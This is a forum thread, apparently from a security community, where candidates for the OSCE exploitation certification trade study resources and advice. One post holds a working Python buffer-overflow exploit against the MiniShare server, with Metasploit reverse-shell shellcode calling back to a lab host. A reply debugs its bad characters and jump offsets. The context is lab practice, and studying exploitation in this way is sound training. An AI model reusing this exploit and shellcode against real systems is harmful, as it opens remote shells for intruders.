OSCE advice?

This topic contains 43 replies, has 13 voices, and was last updated by  mackwage 3 years, 11 months ago.

  • Author
    Posts
  • #8196
     caissyd 
    Participant

    Hi,

    For those who are already certified, what advice would give to someone like me who is starting the Cracking the Perimeter course in order to later challenge the OSCE certification?

    I have read some stories here and on the internet, but I am curious on what you have done to succeed and what you would change if you were to do it again.

    Thanks in advance for you help

  • #51817
     UNIX 
    Participant

    I listed a couple of useful resources in my review, when I did the OSCE a couple of months ago:

    http://www.thegreycorner.com/
    https://www.corelan.be/index.php/articles/
    http://www.fuzzysecurity.com/tutorials.html
    http://www.amazon.com/The-Shellcoders-Handbook-Discovering-Exploiting/dp/047008023X/
    http://www.amazon.de/Buffer-Overflows-Format-String-Schwachstellen-Funktionsweisen-Gegenma%C3%9Fnahmen/dp/3898641929
    http://www.amazon.com/Fuzzing-Brute-Force-Vulnerability-Discovery/dp/0321446119
    http://www.amazon.com/The-Software-Security-Assessment-Vulnerabilities/dp/0321444426/
    http://www.amazon.com/The-Web-Application-Hackers-Handbook/dp/1118026470/
    http://www.amazon.com/Hacking-The-Art-Exploitation-Edition/dp/1593271441
    http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html

    Certainly more than needed for the OSCE exam, though.

    I’d recommend to get a couple of vulnerable programs and to try to discover and exploit the vulnerabilities yourself. For appropriate targets you could refer to exploit-db and similar sites. A good practice would also be to try to create exploits that utilize different exploitation techniques than the ones that are publicly available.

    The labs can easily be recreated at home, in case you consider to enroll again for some lab time. Also feel free to ask any specific questions that may arise while you go through the materials. ๐Ÿ˜‰

  • #51818
     caissyd 
    Participant

    A good practice would also be to try to create exploits that utilize different exploitation techniques than the ones that are publicly available.

    Thanks UNIX. But what do you mean by “utilize different exploitation techniques”?

  • #51819
     hayabusa 
    Participant

    I’ll second UNIX on all counts. ย And likewise, if you need help, drop me a line.

    Ultimately, dupe as much as you can, both from the course, and from outside of it. ย The more you understand, and can do without too much difficulty, the better. ย 

    Practice, practice, practice.

    As you replied to UNIX’s post, before I posted – By ‘different techniques’, try to find OTHER ways to exploit flaws that are noted in the course materials or what you work with from exploit-db, beyond simply using the publicly available exploits. ย Also, try to learn how to do things for yourself, rather than simply mimicking / copying exactly what someone has done. ย Try to accomplish the same thing, without simply doing exactly as they did. ย This applies to both coding and non-coding exercises (such as some of the web exploitation stuff).

  • #51820
     UNIX 
    Participant

    For example, you could try to utilize a SEH overwrite in order to get to your shellcode, if the public exploit doesn’t take this approach (and if it is applicable to the target application). Another example would be to port the exploit to newer operating systems, which will most likely result in different approaches that are necessary in order to get your shellcode executed when facing increased exploit mitigations, such as DEP, ASLR, etc.

  • #51821
     Dark_Knight 
    Participant

    Which fuzzer framework would you all recommend? Spike or Peach or ???

  • #51822
     UNIX 
    Participant

    It depends on what you want to fuzz, e.g. file formats or a network protocol. For commercial fuzzers I’d recommend to take a look at Defensics and beSTORM. As for the free ones, I like Peach, although it takes quite a while until one gets used to it. I also had good results with FOE2.

    Eventually it won’t hurt to write your own fuzzers though. ๐Ÿ˜‰

  • #51823
     dynamik 
    Participant

    I can’t elaborate without providing spoilers, but I wish I would have gone through this in advance: http://www.amazon.com/Advanced-Windows-Debugging-Mario-Hewardt/dp/0321374460

  • #51824
     Dark_Knight 
    Participant

    Ok so can somebody shed some light on this. I am trying to exploit the minishare app from the greycorner. It is a simple buffer overflow exploit. I have already done it the regular way i.e. jmp esp.

    However here is what I am trying,

    #!/usr/bin/python

    import socket

    # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 R |msfencode -a x86 -b “x00” -t c
    # [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

    shell_reverse_tcp = (“xbaxe7x88x98x9axd9xc3xd9x74x24xf4x58x29xc9xb1”
    “x4fx31x50x14x03x50x14x83xc0x04x05x7dx64x72x40”
    “x7ex95x83x32xf6x70xb2x60x6cxf0xe7xb4xe6x54x04”
    “x3fxaax4cx9fx4dx63x62x28xfbx55x4dxa9xcax59x01”
    “x69x4dx26x58xbexadx17x93xb3xacx50xcex3cxfcx09”
    “x84xefx10x3dxd8x33x11x91x56x0bx69x94xa9xf8xc3”
    “x97xf9x51x58xdfxe1xdax06xc0x10x0ex55x3cx5ax3b”
    “xadxb6x5dxedxfcx37x6cxd1x52x06x40xdcxabx4ex67”
    “x3fxdexa4x9bxc2xd8x7exe1x18x6dx63x41xeaxd5x47”
    “x73x3fx83x0cx7fxf4xc0x4bx9cx0bx05xe0x98x80xa8”
    “x27x29xd2x8exe3x71x80xafxb2xdfx67xd0xa5xb8xd8”
    “x74xadx2bx0cx0execx23xe1x3cx0fxb4x6dx37x7cx86”
    “x32xe3xeaxaaxbbx2dxecxcdx91x89x62x30x1axe9xab”
    “xf7x4exb9xc3xdexeex52x14xdex3axf4x44x70x95xb4”
    “x34x30x45x5cx5fxbfxbax7cx60x15xcdxbbxf7x56x66”
    “x42x6cx3fx75x44x7dxe3xf0xa2x17x0bx55x7dx80xb2”
    “xfcxf5x31x3ax2bx9dxd2xa9xb0x5dx9cxd1x6ex0axc9”
    “x24x67xdexe7x1fxd1xfcxf5xc6x1ax44x22x3bxa4x45”
    “xa7x07x82x55x71x87x8ex01x2dxdex58xffx8bx88x2a”
    “xa9x45x66xe5x3dx13x44x36x3bx1cx81xc0xa3xadx7c”
    “x95xdcx02xe9x11xa5x7ex89xdex7cx3bxb9x94xdcx6a”
    “x52x71xb5x2ex3fx82x60x6cx46x01x80x0dxbdx19xe1”
    “x08xf9x9dx1ax61x92x4bx1cxd6x93x59”)

    # stack jmpย  xD9xEExD9x74x24xF4x59x80xC1x0Ax90xFExCDxFExCDxFFxE1
    jmp_back = “xD9xEExD9x74x24xF4x59x80xC1x0Ax90xFExCDxFExCDxFFxE1”

    # jmp esp x7Ex42x93x53 USER32.dll
    jmp_esp = “x53x93x42x7E”

    expl = “x41” * 1271 + “x42” * 517 + jmp_esp + “x90” * 50 + jmp_back + “x90” * 361

    buff = “GET” + expl + “HTTP/1.1rnrn”
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect = sock.connect((“192.168.1.124”,80))
    sock.send(buff)
    sock.close()

    The jmp_esp takes me to our buffer where we could inject shellcode there. However, I decided to try and jump back approx. 512 bytes and try to execute the shellcode.

    However no dice……… Thoughts ๐Ÿ™‚

  • #51825
     caissyd 
    Participant

    Great, thanks for these great responses!

    I get the point regarding exploit development: practice all the techniques often and in different conditions.

    I will also have a good look at the book you proposed ajohnson!

    But what about the other things (web app, router, etc). What do you guys recommend or wish you would have done before the exam? I know I need to practice fuzzing web apps more, that’s for sure, and I was planning on playing with the DVWA and other things like that. But what else would you recommend?

  • #51826
     dynamik 
    Participant

    @dk: I assume you’re not sending the shellcode because it doesn’t make it there. Otherwise, that would be your first problem ;D

    You haven’t got all the bad characters out, and even after that, you’re not jumping back far enough. You’ll currently land in the middle of the shellcode once you correct the characters.

    x = ”
    for i in range(0, 256):
    ย  ย x += “\x%02x” % i
    print x

    will give you a list of all 256 hex bytes. To start, use that as your shellcode and just keep sending longer and longer lines until it doesn’t work, and then strip out a character. I put a break point at the beginning of your jump back and then compared the bytes that were present with what I sent. You could also automate that with pydbg if you’re feeling ambitious. There’s an example in the courseware.

    @HM: There isn’t any web app fuzzing; you’re fuzzing servers. The course actually covers what you need to know for that. Also, be sure to check out the additional resources in the forums. There are decent lists for most, if not all, modules.

  • #51827
     DragonGorge 
    Participant

    @ajohnson wrote:

    I can’t elaborate without providing spoilers

    Hey ajohnson…last I saw you had WIP:OSCE in your sig. You’re not already done and on to the next cert are you? If so… ๐Ÿ˜ฎ

  • #51828
     dynamik 
    Participant

    @dragongorge wrote:

    Hey ajohnson…last I saw you had WIP:OSCE in your sig. You’re not already done and on to the next cert are you? If so… ๐Ÿ˜ฎ

    Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ๐Ÿ˜‰

    I put a very intense 4-6 months into the OSCE, so it’s not like I just breezed through it.

  • #51829
     MaXe 
    Participant
  • #51830
     DragonGorge 
    Participant

    @ajohnson wrote:

    Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ๐Ÿ˜‰

    I put a very intense 4-6 months into the OSCE, so it’s not like I just breezed through it.

    Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

    How’d it go BTW? Did you write a review?

  • #51831
     dynamik 
    Participant

    @dragongorge wrote:

    Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

    How’d it go BTW? Did you write a review?

    Totally understandable; I was just teasing ๐Ÿ™‚

    I’m way behind on a lot of reviews I want to write. The next 4-6 weeks are insane for me, so it’ll be a bit longer still. I’ll definitely post a link here when I have a chance to get to it though.

    Suffice to say, it was both the most challenging and rewarding cert I’ve done.

    @maxe wrote:

    Manual Shellcode: http://www.exploit-db.com/wp-content/themes/exploit/docs/17065.pdf

    Bypassing Anti-Virus Scanners:
    http://www.exploit-db.com/wp-content/themes/exploit/docs/17066.pdf

    MaXe, how many shells do you have from all of us opening those Intern0t PDFs?

  • #51832
     Dark_Knight 
    Participant

    @ajohnson wrote:

    @dk: I assume you’re not sending the shellcode because it doesn’t make it there. Otherwise, that would be your first problem ;D

    You haven’t got all the bad characters out, and even after that, you’re not jumping back far enough. You’ll currently land in the middle of the shellcode once you correct the characters.

    x = ”
    for i in range(0, 256):
    ย  ย x += “\x%02x” % i
    print x

    will give you a list of all 256 hex bytes. To start, use that as your shellcode and just keep sending longer and longer lines until it doesn’t work, and then strip out a character. I put a break point at the beginning of your jump back and then compared the bytes that were present with what I sent. You could also automate that with pydbg if you’re feeling ambitious. There’s an example in the courseware.

    I seem to be missing something as it relates to jumping back into the stack. Currently I am jumping back approx. 512 bytes. I tried jumping back further but then I jump out of my allocated buffer.

    Any help as it relates to jumping back?? Thats where I am having the problem..

  • #51833
     MaXe 
    Participant

    @dragongorge wrote:

    @ajohnson wrote:

    Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ๐Ÿ˜‰

    I put a very intense 4-6 months into the OSCE, so it’s not like I just breezed through it.

    Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

    How’d it go BTW? Did you write a review?

    No, but I did:
    https://forum.intern0t.org/blogs/maxe/95-cracking-perimeter-part-1.html

    https://forum.intern0t.org/blogs/maxe/101-cracking-perimeter-part-2.html
    https://forum.intern0t.org/blogs/maxe/108-cracking-perimeter-part-3.html
    https://forum.intern0t.org/blogs/maxe/111-cracking-perimeter-part-4.html

    @ajohnson wrote:

    @maxe wrote:

    Manual Shellcode: http://www.exploit-db.com/wp-content/themes/exploit/docs/17065.pdf

    Bypassing Anti-Virus Scanners:
    http://www.exploit-db.com/wp-content/themes/exploit/docs/17066.pdf

    MaXe, how many shells do you have from all of us opening those Intern0t PDFs?

    A couple of thousand, people that appreciated reading them ๐Ÿ™‚ I don’t put bad stuff in my papers, code, pocs, etc.
    (Some of them may have very basic anti script kiddie measures, but it’s as simple as finding the field where I wrote: you have to uncomment this line or the script won’t work.)

  • #51834
     dynamik 
    Participant

    @dark_knight wrote:

    I seem to be missing something as it relates to jumping back into the stack. Currently I am jumping back approx. 512 bytes. I tried jumping back further but then I jump out of my allocated buffer.

    Any help as it relates to jumping back?? Thats where I am having the problem..

    I put a break point at the beginning of the piece that jumps back and then stepped through it. After it actually made the jump, I was in the middle of the shellcode I used after all the Bs. This is how I went about it with what you already had, so maybe we’re going about it in a different manner?

    expl = "x41" * 1271 + "x42" * (517-len(shell_reverse_tcp)) + shell_reverse_tcp + jmp_esp + "x90" * 50 + jmp_back + "x90" * 361

    I’d just start your jmp_back code with a break point, step through it, and see where you end up. I’m also on a different SP as I had to change the jmp esp value, so maybe there are other variables in play. When in doubt, break and step.

    @maxe wrote:

    A couple of thousand, people that appreciated reading them ๐Ÿ™‚ I don’t put bad stuff in my papers, code, pocs, etc.
    (Some of them may have very basic anti script kiddie measures, but it’s as simple as finding the field where I wrote: you have to uncomment this line or the script won’t work.)

    Yea, they’re great. I definitely referred to the AV bypass one as I was going through the course.

  • #51835
     caissyd 
    Participant

    MaXe and ajohnson, you are both gold mines!!!

    Now I have a ton of things to read and practice.ย  ๐Ÿ™‚

    BTW, do you guys know where I can get a WinXP VM that I can use in my lab? I am running a AMD64 Linux machine at home…

    Thx

  • #51836
     UNIX 
    Participant
  • #51837
     caissyd 
    Participant

    You could try these ones:
    http://www.microsoft.com/en-us/download/details.aspx?id=11575

    Great thanks UNIX! You too (and many more here) are a gold mine!! ย ๐Ÿ˜€

    I have also found this http://www.mydigitallife.info/how-to-convert-and-import-vhd-to-vmdk-vmware/ to convert these VHD to VMWare VMDK format.

    Update: The last step: http://hacktolive.org/wiki/Using_VMware_images_%28.vmdk_files%29

  • #51838
     DragonGorge 
    Participant

    @maxe wrote:

    No, but I did:
    https://forum.intern0t.org/blogs/maxe/95-cracking-perimeter-part-1.html

    First off…I had to read the beginning of your review/blog twice…you took OSCE not having taken the OSCP?!?!ย  ๐Ÿ˜ฎ Whoa! I have to give you the Wayne’s World “We’re not worthy” bow.

    Great review. One thing I noticed was that the writing in the beginning differed from the end which seemed much more frenetic – I attributed it to an abuse of Red Bull that Offsec seems to demand. Could also be all those exploded brain cells from the class/exam. ๐Ÿ™‚

    Also, noticed the line “I passed and nothing could ruin my mood. Ex was whining, angry customers, and heaps more bad stuff going on….” Earlier you wrote “my girlfriend understood me….” Couldn’t help but wonder if the “ex” status was attributable to the OSCE. I know my SO was more than fed up by the end of the OSCP.

    Again, great review.

  • #51839
     MaXe 
    Participant

    Indeed I did DragonGorge, and it was also my first course and certification I had ever taken, plus I don’t have any lengthy education, or for that sake, a long history of relevant business experience. (Of course, as I am a community guy, I’ve been in the hacking world for a long time.)

    Yea, during the course and the certification it became increasingly harder, hence the reason the writing style changed to display my frustration ย ;D
    I’d say it’s exploded brain cells, it was nice to be in several scenarios where you have to think outside the box and come up with clever solutions ย ๐Ÿ™‚

    Well, in the beginning she said she understood I had to study most evenings where I could be at her place 10pm or so. After a couple of weeks the whining began, but during the actual exam I had specifically told no whining as I will lose concentration completely, she respected that and I am glad she did.

    Afterwards though, she began to whine again but that day when I got the email, nothing could as previously said, ruin my mood. Passing a certification is just a great feeling when it’s been a long and hard journey.

    The reason she became my ex, was not related to OSCE, even though it could’ve been a cool story ย ;D “The only certification that will make your wife or girlfriend leave you” xD (I broke up with her, as I realised I now had OSCE and didn’t need a girlfriend, jk, it was for other personal reasons ย ;D In short, she was bad for me (I know that most women complain about a lot of things (because it’s socially accepted in most cultures), but this one was over level 9000), but it’s the kind of bad that feels a little good hehe )

    Thanks for the feedback / response, I enjoyed writing it ๐Ÿ™‚

  • #51840
     cd1zz 
    Participant

    @H1t M0nk3y

    OSCE is hard. Best advice I can give looking back is to simply practice. I used to go to exploit db, pull down exploits, strip out all the stuff in the middle and start with a simple crash. From there, rebuild the exploit. If you do that 100 times, you’re in good shape ๐Ÿ™‚

    The course material is merely supplemental to what’s needed for the exam, assuming you have no experience prior. Go for it though, even if you fail, keep going because it’s really really good stuff. You’ll eventually get it.

  • #51841
     hayabusa 
    Participant

    @cd1zz wrote:

    @H1t M0nk3y

    OSCE is hard. Best advice I can give looking back is to simply practice. I used to go to exploit db, pull down exploits, strip out all the stuff in the middle and start with a simple crash. From there, rebuild the exploit. If you do that 100 times, you’re in good shape ๐Ÿ™‚

    The course material is merely supplemental to what’s needed for the exam, assuming you have no experience prior. Go for it though, even if you fail, keep going because it’s really really good stuff. You’ll eventually get it.

    Great advice, there.ย  Sums it all up, nicely.ย  Even IF you fail the first time (MOST but not all of us did), it opens your eyes, and you’ll definitely nail it on a second go, because you’ll be confident.ย  But if you follow cd1zz, ajohnson and MaXe’s advice, you’ll do well.

  • #51842
     caissyd 
    Participant

    Thank you all for these great advice.

    I have a pretty good idea now about what to do for exploit development. But what about the web apps and the network sections? Any advice on these two topics?

  • #51843
     UNIX 
    Participant

    The sections about web application and network security are rather short, as the focus of the CTP course lies within application security. Being a web developer you already have a good background, so I’d just recommend to play around with some of the many available vulnerable VMs, if you want some further practice. If you haven’t already read it, I’d also recommend The Web Application Hacker’s Handbook in order to get a good overview on the subject.

    In terms of the network security section, you could look into something like GNS3.

  • #51844
     lepke 
    Participant

    It appears I am a little late to the party however, as an aspiring OSCE I just wanted to say thanks for the wealth of great information. I begin the course on 7/27, so this information will undoubtedly come in handy!

  • #51845
     superkojiman 
    Participant

    @lepke wrote:

    It appears I am a little late to the party however, as an aspiring OSCE I just wanted to say thanks for the wealth of great information. I begin the course on 7/27, so this information will undoubtedly come in handy!

    I just finished the course a couple of weeks ago and I’m waiting to take the exam now. You’ll definitely have lots of fun. As with OSCP, be prepared to do your own research.

  • #51846
     lepke 
    Participant

    Awesome, I would expect nothing less from an OS course. Good luck on the exam!!

  • #51847
     mackwage 
    Participant

    @dynamik wrote:

    I can’t elaborate without providing spoilers, but I wish I would have gone through this in advance: http://www.amazon.com/Advanced-Windows-Debugging-Mario-Hewardt/dp/0321374460

    Just had my first attempt at the exam and failed so going back through materials. I *think* I know what you are aiming at here.

  • #51848
     mrpotato 
    Participant

    I wouldn’t take it too badly – I failed my first attempt and am currently revising for round two. Wish I’d found this thread before starting (that and read a bit more around the topic)!

    Have to say that the OSCP and the OSCE have been the absolute best courses I’ve taken in this field. I didn’t find the CEH or 7Safe offerings to be much of a comparison, despite their prices being far higher.

    Ben

  • #51849
     mackwage 
    Participant

    Have you found any specific good materials to review?

    Hard to have this conversation without spoilers for others. ๐Ÿ™‚

  • #51850
     mrpotato 
    Participant

    I may have gone overboard. Amazon is a terrible beast!

    I’m currently getting through:

      Windows Internals 6th Edition
      The Shellcoder’s Handbook
      The IDA Pro Book
      Hacking Exposed Web Applications 3

    I found that I was blindly fuzzing things and looking to copy techniques without really understanding what was going on ‘under the hood’. I’m also using OWASP’s WebGoat to practice.

    I find going through the exercises in the books to be the most useful thing (for me). If I don’t apply what I read it just slowly exists my brain! I’ll supplement my reading list after looking through this thread though.

    Do you have any thoughts?

    Ben

  • #51851
     dynamik 
    Participant

    If you guys want to post general topics you’re struggling with, we can try to provide additional resources.

    Also, feel free to PM me if you’re concerned about spoiling anything by posting publicly (though you won’t get any spoilers in return ;))

  • #51852
     hayabusa 
    Participant

    @dynamik wrote:

    If you guys want to post general topics you’re struggling with, we can try to provide additional resources.

    Also, feel free to PM me if you’re concerned about spoiling anything by posting publicly (though you won’t get any spoilers in return ;))

    ^^ +1 for / from me

  • #51853
     mackwage 
    Participant

    You all are awesome!

  • #51854
     morehn 
    Participant

    Hi Guys !

    I need some guideline for this exam.
    Could You help me out ?

  • #51855
     hayabusa 
    Participant

    For the exam, itself? Not much we can help with / share. The exam is YOUR test of knowledge. Not really something that others should be doing with / for you.

    What, exactly, are you asking about / looking for?

  • #51856
     mackwage 
    Participant

    @morehn wrote:

    Hi Guys !

    I need some guideline for this exam.
    Could You help me out ?

    Buy some Red Bull. ๐Ÿ˜‰

  • #51857
     morehn 
    Participant

    Buy some Red Bull. ๐Ÿ˜‰ –> Been there, done that ๐Ÿ™‚

    What, exactly, are you asking about / looking for? –>
    What I’m looking for is some sort of hints.
    My opinion is, that the exam is asking a lot more than given on the course.
    Just some sort of tutorials-books suggestions I’m asking for to get the “heureka”-idea about the exam. I want to work and earn this exam, but I’m out of ideas, where to look for solution or where to learn from. I’m really missing the extra mile tasks from the course. I guess it’s easy exam, if you are doing this type of work for years.
    If someone willing to help, discuss it in pm, don’t want to spoil anybody’s exam.

  • #51858
     hayabusa 
    Participant

    The only suggestion I can give you is to look at ALL the resources Offsec provides to students (not just the specific course pdf’s and videos). They have a wealth of information at your disposal.

  • #51859
     mackwage 
    Participant

    @hayabusa wrote:

    The only suggestion I can give you is to look at ALL the resources Offsec provides to students (not just the specific course pdf’s and videos). They have a wealth of information at your disposal.

    +1

You must be logged in to reply to this topic.

Copyright ยฉ2019 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?